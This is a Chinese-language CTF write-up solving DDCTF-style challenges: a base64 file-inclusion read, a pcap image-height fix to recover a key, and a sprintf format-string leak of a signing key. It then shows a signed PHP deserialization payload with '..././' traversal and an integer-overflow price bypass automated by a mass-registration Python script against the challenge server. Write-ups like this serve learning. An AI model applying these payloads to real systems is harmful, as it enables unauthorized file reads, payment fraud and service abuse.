只做出一道web,一道misc,好菜。接下来看大佬的wp学习下吧。
web1
打开链接,可以看到可能存在文件包含的url,有base64编码的参数,,经2次base64解密加转字符串为flag.php。
审查元素,可以看到图片的base64编码。
接下来将index.php先转16进制然后经2次base64编码,提交,将返回的base64解码得到index.php源代码。
可以知道,我们传进去的jpg参数成为文件名然后被读取。接下来就是找到flag文件名了。
然后脑洞大开,我们可以看到源代码上面有个博客,还有个日期,我们访问,并且找到对应日期的那篇,里面提到了一个文件practice.txt.swp,访问它,得到一个文件名。然后按照刚才的操作传递给jpg,这里的!用config代替。
将返回的base64解码得到f1ag!ddctf.php的源代码。
其中extract($_GET);是将你get提交的参数进行赋值。利用php伪协议绕过。
Wireshark
用wireshark打开,导出所有http,可以看到有一个img_add_info是在线图片加解密的网站,并且,还有两个图片文件。
打开网站可以看到可以上传解密图片,并且还需要密码。
去掉开头的无用内容。
保存为png,可以看到有两个图片。有一个带有钥匙,并且明显宽高比例差距很大,因此修改下高的大小。我们先看图片信息,为1600x544,我们将它改为1600x1600。用winhex打开。将0220改为0640。(544对应的十六进制为0220,1600对应0640)
然后保存图片可以得到key
在开始的网站解密另一张图片,得到十六进制字符串,转码得到flag。DDCTF{NbuiBUlR5lhww2OfpEmueZd64OlRJ1D2}
web签到题
打开页面提示,权限不够。抓包,可以看到有个didictf_username参数为空,改为admin,访问,得到返回/app/fL2XID2i0Cdh.php。访问得到源代码。接下来代码审计。
Application.php里有一个Application类,auth函数就是检测didictf_username是否为admin。重点是__destruct函数,用过构造path,利用它可以读取我们想要的文件。path要满足长度为18,并且将../替换为空,用双写绕过即可。
Session.php代码很长,看重点部分。
$hash = substr($session,strlen($session)-32);
$session = substr($session,0,strlen($session)-32);
if($hash !== md5($this->eancrykey.$session)) {
parent::response("the cookie data not match",'error');
return FALSE;
}
$session = unserialize($session);
对session了进行反序列化,这里就是要利用反序列化创建Application,然后读取文件。
所以思路就是传入构造的session,通过session反序列化,创建Application对象,利用destruct函数读取文件。
但是他对session做了签名,判断传入的session最后32位是否等于md5(eancrykey.$session),所以就要知道eancrykey的值。当时做题的时候就卡在这里。看到有个注释 说key建议为8位字符串,还想去爆破。。。
接下来看eancrykey出现的位置,有两处。
private function get_key() {
//eancrykey and flag under the folder
$this->eancrykey = file_get_contents('../config/key.txt');
}
if(!empty($_POST["nickname"])) {
$arr = array($_POST["nickname"],$this->eancrykey);
$data = "Welcome my friend %s";
foreach ($arr as $k => $v) {
$data = sprintf($data,$v);
}
parent::response($data,"Welcome");
}
上面那个不可能,重点关注下面那个。我们随便提交个nickname,可以看到。
当我们传入的nickname为hello的时候,第一次赋值后,data将变为Welcome my friend hello。后面的eancrykey,已经没有占位符了。
所以传入nickname为%s,第一次赋值后,data还是Welcome my friend hello %s,第二次辅助就会将eancrykey返回。得到为EzblrbNS。
接下来就好办了,构造path为..././config/flag.txt(注释提示了flag和key同一个文件)。将其序列化。
//序列化
O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}
//加上MD5签名
O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}5a014dbe49334e6dbb7326046950bee2
//url编码
O%3A11%3A%22Application%22%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A21%3A%22...%2F.%2Fconfig%2Fflag.txt%22%3B%7D5a014dbe49334e6dbb7326046950bee2
提交得到flag。
大吉大利,今晚吃鸡~
按流程走一遍,注册账号,然后购买券。支付,但是支付的时候需要2000,余额只有100。因此在购买的时候抓包,修改price,但是测试发现只能修改成比2000大,想到可能是溢出。用这个插件可以看到是go语言写的。
搜一下go语言的数据类型,一个一个试。当price为4294967295是返回500,出现异常。提交price为4294967296。
可以看到支付成功,并返回了一个id和ticket,通过id和ticket可以移除对手,接下来就是从哪去找。
又重新注册个账号,买券,得到id和ticket。然后在刚才那个账号中去移除,可以发现移除成功,剩余人数99人。接下来编写脚本,注册账号,买票,支付,得到id和ticket,然后用第一次那个账号移除它
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time
url_register = "http://117.51.147.155:5050/ctf/api/register?name={}&password={}"
url_buy = "http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296"
url_pay = "http://117.51.147.155:5050//ctf/api/pay_ticket?bill_id={}"
url_remove = "http://117.51.147.155:5050/ctf/api/remove_robot?id={}&ticket={}"
headers = {
"Cookie": "user_name=gelinlang; REVEL_SESSION=2f73da6d52afd64e0641fcc79e0b781e"
}
for i in range(1, 777):
res = requests.session()
user = res.get(url_register.format("gelinlang"+str(i), 12345678))
buy = res.get(url_buy)
#print(buy.json())
id = buy.json()["data"][0]["bill_id"]
#print(id)
pay = res.get(url_pay.format(id))
id = pay.json()['data'][0]["your_id"]
ticket = pay.json()["data"][0]["your_ticket"]
#print(id, ticket)
gelinlang = requests.get(url_remove.format(id, ticket), headers=headers)
print(gelinlang.text)
time.sleep(0.5)
一直跑直到最后最后吃鸡,得到flag。
